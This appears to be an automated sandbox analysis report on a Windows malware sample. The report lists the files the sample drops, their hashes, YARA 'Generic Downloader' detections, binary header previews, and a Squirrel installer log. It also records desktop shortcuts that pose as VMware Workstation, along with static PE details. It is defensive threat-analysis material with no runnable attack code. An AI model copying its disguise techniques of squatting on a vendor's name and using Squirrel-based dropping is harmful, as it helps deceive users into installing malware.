C:\Users\user\AppData\Local\DefMeta\Update.exe

Download File

Process:	C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1899520
Entropy (8bit):	5.894883178349122
Encrypted:	false
SSDEEP:	24576:pWltPuAnUCiag6CKM2zCy9sQuOjj1VgZej6GeS4lNrCze5qhYp4t9m2:0t3UCiag6CKM2zCyZuOjJaxSS5qh
MD5:	A560BAD9E373EA5223792D60BEDE2B13
SHA1:	82A0DA9B52741D8994F28AD9ED6CBD3E6D3538FA
SHA-256:	76359CD4B0349A83337B941332AD042C90351C2BB0A4628307740324C97984CC
SHA-512:	58A1B4E1580273E1E5021DD2309B1841767D2A4BE76AB4A7D4FF11B53FA9DE068F6DA67BF0DCCFB19B4C91351387C0E6E200A2A864EC3FA737A1CB0970C8242C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\DefMeta\Update.exe, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5.p_............................>.... ........@.. .......................`............@.....................................W.... .......................@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................ .......H.......LU..............,.................................................{......{......{....r.(......}......}......}........0..S........u......,G(.....{.....{....o....,/(.....{.....{....o....,.(.....{.....{....o.......0..K....... .A. )UU.Z(.....{....o....X )UU.Z(.....{....o....X )UU.Z(.....{....o....X..0...........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(........{......{....

C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80800
Entropy (8bit):	6.781496286846518
Encrypted:	false
SSDEEP:	1536:FRk1rh/be3Z1bij+8xG+sQxzQF50I9VSHIecbWZOUXYOe0/zuvY:FRk/+Z1z8s+s+QrTmIecbWIA7//gY
MD5:	1E6E97D60D411A2DEE8964D3D05ADB15
SHA1:	0A2FE6EC6B6675C44998C282DBB1CD8787612FAF
SHA-256:	8598940E498271B542F2C04998626AA680F2172D0FF4F8DBD4FFEC1A196540F9
SHA-512:	3F7D79079C57786051A2F7FACFB1046188049E831F12B549609A8F152664678EE35AD54D1FFF4447428B6F76BEA1C7CA88FA96AAB395A560C6EC598344FCC7FA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.Dq.."..".."..+#.."..".."..+"4."}.)#.."}..#.."}./#.."}.#.."}..".."}.(#.."Rich.."........................PE..L...7.O.........."!... .....................................................P............@A........................0........ .......0...................'...@.......$..T............................#..@............ ...............................text...D........................... ..`.data...............................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe

Download File

Process:	C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	89392
Entropy (8bit):	6.732128875673087
Encrypted:	false
SSDEEP:	1536:dXkQyiMoenxFAyL79+olDm4Wj7zKRvJQIRb41PxHM73cP0d:dXkQyXpnQm+EU7zKRvJQIRb0xHMDcP0d
MD5:	436CEDFA08F245AD52DD221BEC4480A4
SHA1:	BDCD2A73AA4AA4C10B3BBCCEA75397CB36E5D058
SHA-256:	2ADC7AEEAC540D9DED381D10C24F35A428EAA1298829262F11D1B0BB7AB0F24B
SHA-512:	4FF805500006E6E794690E4D67417669A6811206C5A1686F751759B4875A8302D6094C877ECF61A6BE11EE00B87B69C79FEE9CE444EE9F7300074E2CF646D802
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........9^O.W.O.W.O.W.)...N.W...V.M.W...V.E.W...V.M.W.F...\.W.O.V.R.W...R.Y.W...S.C.W...T.L.W...S.F.W...R.M.W....N.W...U.N.W.RichO.W.........PE..L.....tc..........................................@..........................@.......Y....@.....................................@.... ..h...............0U...0..D...`...T...............................@...............8............................text.............................. ..`.rdata...b.......d..................@..@.data...............................@....rsrc...h.... ......................@..@.reloc..D....0......................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmwarebase.dll

Download File

Process:	C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28473628
Entropy (8bit):	0.33608892607340235
Encrypted:	false
SSDEEP:	12288:s7TvKmZ1BjzIA9U2r4mQ+OeO+OeNhBBhhBBaD9PryXTr466lkr0HjGfsvmsOcAr2:89UHmokjram0HjG40cArP3wN1IsEj7
MD5:	68B2CBEF5E86E5CAF18742C7338977D3
SHA1:	7ED1639821769C675828627C7BA2C8E2F154C905
SHA-256:	6F9C0E7B66CD0BFE35355FE7F8B025DBE7F698090CEDD31059D43AC42D1DAC12
SHA-512:	A06EBFBCAE9C06D23E7453B03616AD1F8B4666410BB7BDD301BF76DFC5B262EC2652B3149D9BE9D7D32AC47C09AD10147C72F02DD76218E6AD55472CDDEC28C0
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......R[..:...:...:...Q...:...Q..:...Q...:..v@...:..v@...:..v@..Y:...Q...:...:..:..r@..0:..r@...:..r@...:..r@...:..r@J..:..r@...:..Rich.:..................PE..L......e...........!... .....................................................`............@..........................M.......{..x................................S.. ...p...........................`...@............................................text............................... ..`.rdata..............................@..@.data....U.......6...r..............@....rsrc...............................@..@.reloc...S.......T..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\DefMeta\packages\DefMeta-1.0.0-full.nupkg

Download File

Process:	C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	428463
Entropy (8bit):	7.815358584631611
Encrypted:	false
SSDEEP:	12288:ZcAxh8e897I3drk/HOb9/d9wax9NPNjMO:ZBf8eK7INY/HVa95MO
MD5:	CE2F9369B2132B11B0492E935DBB8101
SHA1:	7D9F0BDEEF227CD2C9E3EFF9ACEEAD28B6C993F7
SHA-256:	60D98FAD89B74E8A9DD16BAEEB4C584C6037E00A71DF0D3D7576394766B99715
SHA-512:	97441B722CBC4BAD6FDB3AB3206BB3CD10DEFCF4497D3DCC2DA6010E770C65D87221E5DEC5B57A3C5DE2EF5A64F9A44CC9DB309A59577DF9C55B8462207342E4
Malicious:	false
Preview:	PK........,.OX................DefMeta.nuspecu.MN.0...H...L.!.......a9.."...@{$.....q..6n.Rw.73z...........d.[.UUs.N..~.'.n.F^^.....v..\| .w.I.hU....'.Q...Co..M.j...7......e....ZEjO.M+..{..\..K.XU-`.....=.OM4...w........1..d">......H9..ScB...2.b....Y..'b.K...)...a.M?.\|(...`...k.G.pP8....[..PK........,.OX................lib/PK........,.OX................lib/net48/PK........,.OX...6T....;......lib/net48/vcruntime140.dll.].\S...!..F_..b...Kk.aNHk1...h...""?..@.=.(4..^.....mn.....m....Z...m....P._..d.s.K..`.g...Y>...{..{.........\|>.;.).dn._/...~=.O3.hV.i...JsyE...m....2..%.\!...J.KW........;vt..c.[K.....f....fMGhz.3'........;k.......Y...5+.......,..(....E...q+4..[......1F3..:v...u.....#...8...h...B.cbt...L^.P.o T....g..q....Y.24\.6.0...7..@...p.~0j.0c.5........w...v....?...m...#.PQ...0.}.P.]."..`8k[aH.-p..**+r.g}.g...../). .............+?O...+..z7b..p..<.^......Q.9.J..+'.h.g&..<G"..I..T......x...K...t...Y.`.<.y.9....L^.y..3..0y......}.q..y.

C:\Users\user\AppData\Local\DefMeta\packages\RELEASES

Download File

Process:	C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	75
Entropy (8bit):	4.749246865019509
Encrypted:	false
SSDEEP:	3:ajV2mXlB40YlmhJxrGo:ajVDXlB408mhjGo
MD5:	9AF3A6EEFB47F5883FD4E784C8CAEF90
SHA1:	603C78E00F4F9D44AA6F2378A4184A8424CAD840
SHA-256:	CF70EE1BBADD1FB3796B7FBB64770A80A8D6C7EB7BC49567743FC2E8EE06B579
SHA-512:	C13CFCB32ACC31535E581B6E8A0E665DFA2AE393B8CA3ED6ECD63A712FE018CFF1D1711FA0CC90154F5FB87EC8105D4E9D4EF5AD5C0BE8C2286A011F52C449EB
Malicious:	false
Preview:	.7D9F0BDEEF227CD2C9E3EFF9ACEEAD28B6C993F7 DefMeta-1.0.0-full.nupkg 428463

C:\Users\user\AppData\Local\DefMeta\packages\SquirrelTemp\tempa

Download File

Process:	C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	75
Entropy (8bit):	4.749246865019509
Encrypted:	false
SSDEEP:	3:ajV2mXlB40YlmhJxrGo:ajVDXlB408mhjGo
MD5:	9AF3A6EEFB47F5883FD4E784C8CAEF90
SHA1:	603C78E00F4F9D44AA6F2378A4184A8424CAD840
SHA-256:	CF70EE1BBADD1FB3796B7FBB64770A80A8D6C7EB7BC49567743FC2E8EE06B579
SHA-512:	C13CFCB32ACC31535E581B6E8A0E665DFA2AE393B8CA3ED6ECD63A712FE018CFF1D1711FA0CC90154F5FB87EC8105D4E9D4EF5AD5C0BE8C2286A011F52C449EB
Malicious:	false
Preview:	.7D9F0BDEEF227CD2C9E3EFF9ACEEAD28B6C993F7 DefMeta-1.0.0-full.nupkg 428463

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Update.exe.log

Download File

Process:	C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2751
Entropy (8bit):	5.372322730968244
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6ouHlJH/lEHuFKHKS+AHKKk7O6HFHKp1qHGIsCtHTHNHkbEHKxHO:iqbYqGSI6ou/fmOYqSJqKk7jlqpwmjCX
MD5:	E186D8CCFA77C108F5C38908EF87820C
SHA1:	47495A5AE5BE859D96CD2C2BD276A4B9A8B441C0
SHA-256:	E2CDF4184CFAFC04DCEB16A3AB1826DBB566B677590B5852A74411BA8B308142
SHA-512:	4173349453148C359F9E0DD698D7C8142A3198BD327722A3D5D5BD1C19F9695EFE732DB3769FB938FF3705AA3CC35A90EDFF2B2ED6F08F2901E376C6A3A1EE5E
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\WindowsBase\95a5c1baa004b986366d34856f0a5a75\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\ef4e808cb158d79ab9a2b049f8fab733\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\beginTc[1].zip

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	8907083
Entropy (8bit):	7.99997851317994
Encrypted:	true
SSDEEP:	196608:3XxOUkDXhY9oRT+OZFCkEj19es+H8UPqrvXIJcC+nkItsX+qOPB0:3XoX290+6yhQbTTIy8B0
MD5:	C89C700FA943B468B7DE3BC145D06848
SHA1:	EDF217A82AF64D1D9347D90C41C38A9262E1596C
SHA-256:	7A85B962D904F82AFD8D2DB6FF0760D761978FF09C0BF1D40287C6ED630A9130
SHA-512:	76C6E606AF8C05DEB74FEC92F95105BCFCFBC6B6D65A104B35BD38D87296B91203F91164B6D536660CE8594F3653C1AD8791EA026A776F92D91EAC58CE21743B
Malicious:	false
Preview:	..''....H..i..E.Dh.&e.a...6....#....+oS.....F.ve.Gs....UQ...hL.E......a...dt...=.H7.X......-.&N..n.;.....fxAI........h..0..<J......]...by._..fb.. ....7..&....Y<S~...9......3u.v..._.Jnq.. .a....<....\|......K.$..(tei.\|..Y_/L..P...G)...LUD-....(..}.........9..v...:...O.Q8.../1.8.3).p.TA..7.....?.3e....e.........}.8<+...3?....>....<.H.!..s..J..~.W.~.-.o. ..Z<.s........W.+...JT<...}.T.rz..,.i.y.....}.tc....z.`...c.(...?..K.5.P5^..b...X.r.q.[.o'Z.8.....'.+eO..;..H......W....S,...!:.....k..]9v.^...0.#..X..9T..^.&Q... g6.1...:].KO.1....A.L.......8...-Y.y.bn......bJ.}...&...3N/.m..s.;(.l.o}z...iv..GQ....).QL...\.v......../J..#..CD0)........".L.MC...]K!..`.L..../...f..w.a.h.0.].uk.._.8`.&3..9Ff/6Deap....i7.rdj&....8..u.1..f/nswuQ....5.$....iy.:. .....I..<xM.d..9._.$.".\|.F....V..6.H...!...~..<4v..-...#Ja.d...."xS..A.....M..`.^..>.@..>z...}..K.B..._i[.....M.L.3...Ky.mL..Z$....]...%.m....Y..........1\a........y....:Q.v.KQ....".-F.4

C:\Users\user\AppData\Local\SquirrelTemp\DefMeta-1.0.0-full.nupkg

Download File

Process:	C:\Users\user\Desktop\0923840932020004-3-0.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	428463
Entropy (8bit):	7.815358584631611
Encrypted:	false
SSDEEP:	12288:ZcAxh8e897I3drk/HOb9/d9wax9NPNjMO:ZBf8eK7INY/HVa95MO
MD5:	CE2F9369B2132B11B0492E935DBB8101
SHA1:	7D9F0BDEEF227CD2C9E3EFF9ACEEAD28B6C993F7
SHA-256:	60D98FAD89B74E8A9DD16BAEEB4C584C6037E00A71DF0D3D7576394766B99715
SHA-512:	97441B722CBC4BAD6FDB3AB3206BB3CD10DEFCF4497D3DCC2DA6010E770C65D87221E5DEC5B57A3C5DE2EF5A64F9A44CC9DB309A59577DF9C55B8462207342E4
Malicious:	false
Preview:	PK........,.OX................DefMeta.nuspecu.MN.0...H...L.!.......a9.."...@{$.....q..6n.Rw.73z...........d.[.UUs.N..~.'.n.F^^.....v..\| .w.I.hU....'.Q...Co..M.j...7......e....ZEjO.M+..{..\..K.XU-`.....=.OM4...w........1..d">......H9..ScB...2.b....Y..'b.K...)...a.M?.\|(...`...k.G.pP8....[..PK........,.OX................lib/PK........,.OX................lib/net48/PK........,.OX...6T....;......lib/net48/vcruntime140.dll.].\S...!..F_..b...Kk.aNHk1...h...""?..@.=.(4..^.....mn.....m....Z...m....P._..d.s.K..`.g...Y>...{..{.........\|>.;.).dn._/...~=.O3.hV.i...JsyE...m....2..%.\!...J.KW........;vt..c.[K.....f....fMGhz.3'........;k.......Y...5+.......,..(....E...q+4..[......1F3..:v...u.....#...8...h...B.cbt...L^.P.o T....g..q....Y.24\.6.0...7..@...p.~0j.0c.5........w...v....?...m...#.PQ...0.}.P.]."..`8k[aH.-p..**+r.g}.g...../). .............+?O...+..z7b..p..<.^......Q.9.J..+'.h.g&..<G"..I..T......x...K...t...Y.`.<.y.9....L^.y..3..0y......}.q..y.

C:\Users\user\AppData\Local\SquirrelTemp\RELEASES

Download File

Process:	C:\Users\user\Desktop\0923840932020004-3-0.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	75
Entropy (8bit):	4.749246865019509
Encrypted:	false
SSDEEP:	3:ajV2mXlB40YlmhJxrGo:ajVDXlB408mhjGo
MD5:	9AF3A6EEFB47F5883FD4E784C8CAEF90
SHA1:	603C78E00F4F9D44AA6F2378A4184A8424CAD840
SHA-256:	CF70EE1BBADD1FB3796B7FBB64770A80A8D6C7EB7BC49567743FC2E8EE06B579
SHA-512:	C13CFCB32ACC31535E581B6E8A0E665DFA2AE393B8CA3ED6ECD63A712FE018CFF1D1711FA0CC90154F5FB87EC8105D4E9D4EF5AD5C0BE8C2286A011F52C449EB
Malicious:	false
Preview:	.7D9F0BDEEF227CD2C9E3EFF9ACEEAD28B6C993F7 DefMeta-1.0.0-full.nupkg 428463

C:\Users\user\AppData\Local\SquirrelTemp\Squirrel-Install.log

Download File

Process:	C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (363), with CRLF line terminators
Category:	dropped
Size (bytes):	2346
Entropy (8bit):	5.335447334000246
Encrypted:	false
SSDEEP:	48:E/tHE1cH7311LxUXb5hh2i4H+7h2Nu4zwTu4z4v264RZ6SI7h2zKMRKEv264RZ60:ElR+23q2sWB2nJ82zJF2nJt
MD5:	9EC080C4780A8308465C1D61FB6031C4
SHA1:	61F1149F8142812A855B2FA14B6E3C85E818E58B
SHA-256:	1ABE509FF3F5DF714CFD22887A361B5406E72FBA9CCCC986B9378CF74DAB4C27
SHA-512:	3B631B94B0F511977CA04F029069E69E92DC714D70F1CEE3E95B5C305A1C8E89FF39C6248C688674613525E8C0E39800DA41FCE09EC90DE9DFA308E47F7627A2
Malicious:	false
Preview:	.[16/02/24 14:29:57] info: Program: Starting Squirrel Updater: --install . --rerunningWithoutUAC..[16/02/24 14:29:57] info: Program: Starting install, writing to C:\Users\user\AppData\Local\SquirrelTemp..[16/02/24 14:29:57] info: Program: About to install to: C:\Users\user\AppData\Local\DefMeta..[16/02/24 14:29:57] info: CheckForUpdateImpl: Reading RELEASES file from C:\Users\user\AppData\Local\SquirrelTemp..[16/02/24 14:29:57] info: CheckForUpdateImpl: First run, starting from scratch..[16/02/24 14:29:57] info: ApplyReleasesImpl: Writing files to app directory: C:\Users\user\AppData\Local\DefMeta\app-1.0.0..[16/02/24 14:29:58] info: ApplyReleasesImpl: Squirrel Enabled Apps: []..[16/02/24 14:29:58] warn: ApplyReleasesImpl: No apps are marked as Squirrel-aware! Going to run them all..[16/02/24 14:29:58] info: ApplyReleasesImpl: About to create shortcuts for vmware-authd.exe, rootAppDir C:\Users\user\AppData\Local\DefMeta..[16/02/24 14:29:58] info: ApplyReleasesImpl: Creating

C:\Users\user\AppData\Local\SquirrelTemp\Update.exe

Download File

Process:	C:\Users\user\Desktop\0923840932020004-3-0.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1899520
Entropy (8bit):	5.894883178349122
Encrypted:	false
SSDEEP:	24576:pWltPuAnUCiag6CKM2zCy9sQuOjj1VgZej6GeS4lNrCze5qhYp4t9m2:0t3UCiag6CKM2zCyZuOjJaxSS5qh
MD5:	A560BAD9E373EA5223792D60BEDE2B13
SHA1:	82A0DA9B52741D8994F28AD9ED6CBD3E6D3538FA
SHA-256:	76359CD4B0349A83337B941332AD042C90351C2BB0A4628307740324C97984CC
SHA-512:	58A1B4E1580273E1E5021DD2309B1841767D2A4BE76AB4A7D4FF11B53FA9DE068F6DA67BF0DCCFB19B4C91351387C0E6E200A2A864EC3FA737A1CB0970C8242C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5.p_............................>.... ........@.. .......................`............@.....................................W.... .......................@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................ .......H.......LU..............,.................................................{......{......{....r.(......}......}......}........0..S........u......,G(.....{.....{....o....,/(.....{.....{....o....,.(.....{.....{....o.......0..K....... .A. )UU.Z(.....{....o....X )UU.Z(.....{....o....X )UU.Z(.....{....o....X..0...........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(........{......{....

C:\Users\user\AppData\Local\Temp\.squirrel-lock-0A9DF309FA4FA75EAD220B9627261645FFAC905C

Download File

Process:	C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
File Type:	ISO-8859 text, with CR line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:9:9
MD5:	A7E0F8AC46398A7876D1E40DD52C2AAB
SHA1:	B66922B4E6F09E23C072E4AFF49C67C3121DD5AF
SHA-256:	05174BBF0D407087E45B12BAAE17117426852FF3A9E58D12A0EBB9A10B409743
SHA-512:	E6B93215582F7F4F5E9292273A9466B5D0CC3A4EA7D77AE42854203755441DD5EDBEFB11FE8890CAE7783E41E2EDBF61EC7B03D7E5E9870A7821D4016B095F79
Malicious:	false
Preview:	....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc\VMware Workstation.lnk

Download File

Process:	C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
File Type:	MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has Working directory, Icon number=0, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
Category:	dropped
Size (bytes):	2106
Entropy (8bit):	2.6963892985466433
Encrypted:	false
SSDEEP:	24:8ZvaRyoGJ2YKvm1L1K1KO4ZR52oq1h5HABIqy+E2:8YRsJ2Y2m1L1K1KZv2oq1/AXy+E2
MD5:	A99E70420699505A96B833DA72A4F09D
SHA1:	C1787F9F4BDA483BD9EC01294AC2B78941170A82
SHA-256:	77A3C29ED23B061F0B9551A4C3184A70F638ADB733894B62244FB8BE58FE2EC7
SHA-512:	275AEF6E97D37815C07F6F5903D696610011CC0CA96F3D089BEDA385AB422F6FFA660FDD7E0F7B6BA5AF0503F0FD4AA0C370FA6926A8F6F3ABBAA9E618954FB6
Malicious:	false
Preview:	L..................F.@......................................................A....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....V.1...........DefMeta.@............................................D.e.f.M.e.t.a.....r.2...........vmware-authd.exe..R............................................v.m.w.a.r.e.-.a.u.t.h.d...e.x.e... .....D.e.f.M.e.t.a.0.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.D.e.f.M.e.t.a.\.v.m.w.a.r.e.-.a.u.t.h.d...e.x.e./.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.D.e.f.M.e.t.a.\.a.p.p.-.1...0...0.6.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.D.e.f.M.e.t.a.\.v.m.w.a.r.e.-.a.u.t.h.d...e.x.e.........%USERPROFILE%\App

C:\Users\user\Desktop\VMware Workstation.lnk

Download File

Process:	C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
File Type:	MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has Working directory, Icon number=0, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
Category:	dropped
Size (bytes):	2092
Entropy (8bit):	2.694417806076227
Encrypted:	false
SSDEEP:	24:8ZvaRyoGJ2YKvW1L1K1KO4ZR52oq1h5HABIqy+E2:8YRsJ2Y2W1L1K1KZv2oq1/AXy+E2
MD5:	B42FEDB94F87DA8BFC9CE62B5A4F5675
SHA1:	5E08654DCA4E40758C370C1E79EC2E35FC49234D
SHA-256:	6DDBDD23790327776CC097D89DD33D7B2B4415EAA55D6638C51CE669793C0F13
SHA-512:	8EE3C93882242BA46A3247E324BD9794444A073BC9E5114AB83D3BE13B10ACD495F08FDFA7646B378A004266F91D5E8A93727457347BAB7A714A5C4F31C0927F
Malicious:	false
Preview:	L..................F.@......................................................A....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....V.1...........DefMeta.@............................................D.e.f.M.e.t.a.....r.2...........vmware-authd.exe..R............................................v.m.w.a.r.e.-.a.u.t.h.d...e.x.e... .....D.e.f.M.e.t.a.).....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.D.e.f.M.e.t.a.\.v.m.w.a.r.e.-.a.u.t.h.d...e.x.e./.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.D.e.f.M.e.t.a.\.a.p.p.-.1...0...0.6.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.D.e.f.M.e.t.a.\.v.m.w.a.r.e.-.a.u.t.h.d...e.x.e.........%USERPROFILE%\AppData\Local\Def

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.919666464310412
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	0923840932020004-3-0.exe
File size:	1'294'336 bytes
MD5:	baadaedc15fe5ed8aafb3c74cf4f2f3c
SHA1:	3d8495202660c61d4ea7d6b9e6d3512987b304f4
SHA256:	cad643944905d6bdde925f12412ae8141bf36c62be073243a2d989250b6a8beb
SHA512:	3d2c6b60deaabe4182ad531df08fcba3e9631d1d341ac3277e5e48b5fbf5dbfd175ef8ebaa04d85d092b412de8404da14ea51c5c5fcfc2b13be18193e248837c
SSDEEP:	24576:pZtdiBOXjcL9aZ3gXs7WL0JhLgAnHAS+u/oGUs0XP5iVh4XysZSSwkkPZSvhf/Q:9MBQcEZQi/L5XoG05ChlszkSJA
TLSH:	11552215B2D0C036D1BB163036F4E1B149BEBD314A758DAF6794136D5E301C1EB2ABAB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........X........................y.......................................................a...T.......T.Z.......2.....T.......Rich...

File Icon


Icon Hash:	13170f6d2d6d6d33

Static PE Info

General

Entrypoint:	0x40ab5c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x5F70D7D7 [Sun Sep 27 18:20:07 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	e6f4169f2a5c3a8f93171d9f593bd22a

Entrypoint Preview

Instruction
call 00007F73BC65A69Ch
jmp 00007F73BC659FBFh
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F73BC65A19Dh
mov dword ptr [esi], 0041F45Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0041F464h
mov dword ptr [ecx], 0041F45Ch
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F73BC65A16Ah
mov dword ptr [esi], 0041F478h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0041F480h
mov dword ptr [ecx], 0041F478h
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0041F43Ch
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F73BC65B8ACh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0041F43Ch
push eax
call 00007F73BC65B8F7h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0041F43Ch
push eax
call 00007F73BC65B8E0h
test byte ptr [ebp+08h], 00000001h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2932c	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x11114c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
